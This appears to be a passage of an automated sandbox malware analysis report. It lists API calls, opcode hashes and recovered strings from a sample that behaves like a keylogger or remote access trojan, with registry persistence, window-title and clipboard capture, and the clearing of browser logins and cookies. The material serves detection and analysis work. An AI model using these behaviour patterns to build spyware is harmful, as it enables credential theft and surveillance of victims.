                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: P0F
                                • API String ID: 1818849710-3540264436
                                • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                APIs
                                • TerminateThread.KERNEL32(00409305,00000000,h5S,0040BC76,?,00472200,pth_unenc,h5S), ref: 0040A801
                                • UnhookWindowsHookEx.USER32(00000000), ref: 0040A811
                                • TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,h5S), ref: 0040A823
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: TerminateThread$HookUnhookWindows
                                • String ID: h5S
                                • API String ID: 3123878439-3923149170
                                • Opcode ID: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
                                • Instruction ID: 1ea45cce1470398c8d9247cd1949440ee3d7e4d102938376389503cdeb19b454
                                • Opcode Fuzzy Hash: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
                                • Instruction Fuzzy Hash: A4E01D711443456FE3105F606DD49157B5CE6083597514875B606531B1C67CCC88CB3D
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: 32cdc7c9dabc426cba1924f910902f1b98a76737f1ea6ce3ad05962b761c79b8
                                • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                • Opcode Fuzzy Hash: 32cdc7c9dabc426cba1924f910902f1b98a76737f1ea6ce3ad05962b761c79b8
                                • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                APIs
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                • Cleared browsers logins and cookies., xrefs: 0040B036
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 53613c53924a86662ae771ff56641a82623ac4206652ba19a530518bfbc7e862
                                • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                • Opcode Fuzzy Hash: 53613c53924a86662ae771ff56641a82623ac4206652ba19a530518bfbc7e862
                                • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                APIs
                                  • Part of subcall function 004120E8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: @8T$exepath$h5S
                                • API String ID: 4119054056-82665750
                                • Opcode ID: c119e2e7c47949f47b2a13efb1dcc5748ecfbaa444f344b16444f4acc8e20871
                                • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                • Opcode Fuzzy Hash: c119e2e7c47949f47b2a13efb1dcc5748ecfbaa444f344b16444f4acc8e20871
                                • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                APIs
                                  • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                  • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                  • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                • Sleep.KERNEL32(000001F4), ref: 0040955A
                                • Sleep.KERNEL32(00000064), ref: 004095F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 7cb562bdbf99e03128c45281b0b0095e59bc95eda3a0ebde9d5d10b3a82eef2e
                                • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                • Opcode Fuzzy Hash: 7cb562bdbf99e03128c45281b0b0095e59bc95eda3a0ebde9d5d10b3a82eef2e
                                • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                APIs
                                • GetSystemTimes.KERNEL32(?,?,?,004724A0,?,?,00000000), ref: 004197F6
                                • Sleep.KERNEL32(000003E8,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041588A), ref: 00419801
                                • GetSystemTimes.KERNEL32(?,?,?,?,?,00000000), ref: 00419816
                                • __aulldiv.LIBCMT ref: 0041987D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
                                • Instruction ID: 145d7891b6f1dee57345c91865aa58c1fa38592630094fdfab7f37f82c20bed6
                                • Opcode Fuzzy Hash: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
                                • Instruction Fuzzy Hash: 791160735443446BC308FAB5CC95DEB77ACEBC5388F040A3EF54682091EE39DA488BA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00419FBE
                                • CloseHandle.KERNEL32(00000000), ref: 00419FC9
                                • CloseHandle.KERNEL32(00000000), ref: 00419FD1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$FileModuleNameOpenProcess
                                • String ID:
                                • API String ID: 3706008839-0
                                • Opcode ID: a23d0fe8114767c15cdde0a498d95ac820affdde2608e9dac14c7f136773ffec
                                • Instruction ID: 9bf07e75ebb9e679cccba50474e497f26c5128b29002f083bca96ca2400931d7
                                • Opcode Fuzzy Hash: a23d0fe8114767c15cdde0a498d95ac820affdde2608e9dac14c7f136773ffec
                                • Instruction Fuzzy Hash: D1F0E93124031477D7A067589C0DFE7766CC790B51F100276F508D72E1DEA99C82469A
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                  • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alloca_probe_16__freea
                                • String ID: @8T
                                • API String ID: 1635606685-4097998276
                                • Opcode ID: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
                                • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                • Opcode Fuzzy Hash: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
                                • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                APIs
                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412737
                                  • Part of subcall function 00412446: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                  • Part of subcall function 00412446: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                • RegCloseKey.ADVAPI32(00000000,00463050,00463050,00469654,00469654,00000071), ref: 004128A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuery
                                • String ID: P0F
                                • API String ID: 1014704025-3540264436
                                • Opcode ID: 9f717ca826b6a5a7a1eae360a6ab8c236bfe6e8983a6c7b42836fe175bb5bbc9
                                • Instruction ID: 2d28d635716c3df90d830f6dadb90dee404f775c6aa34bcd6e72966151b01206
                                • Opcode Fuzzy Hash: 9f717ca826b6a5a7a1eae360a6ab8c236bfe6e8983a6c7b42836fe175bb5bbc9
                                • Instruction Fuzzy Hash: 9D41F3306442405BC324F625D992AEFB299AFD1344F40893FB44A631D2EEBC5D4A86AE
                                APIs
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                • API String ID: 1881088180-3686566968
                                • Opcode ID: 4cc0d1ac8e06a4ff285c7657cb7b4d16e2efbbcbde28276865f6a5bca21e441d
                                • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                • Opcode Fuzzy Hash: 4cc0d1ac8e06a4ff285c7657cb7b4d16e2efbbcbde28276865f6a5bca21e441d
                                • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
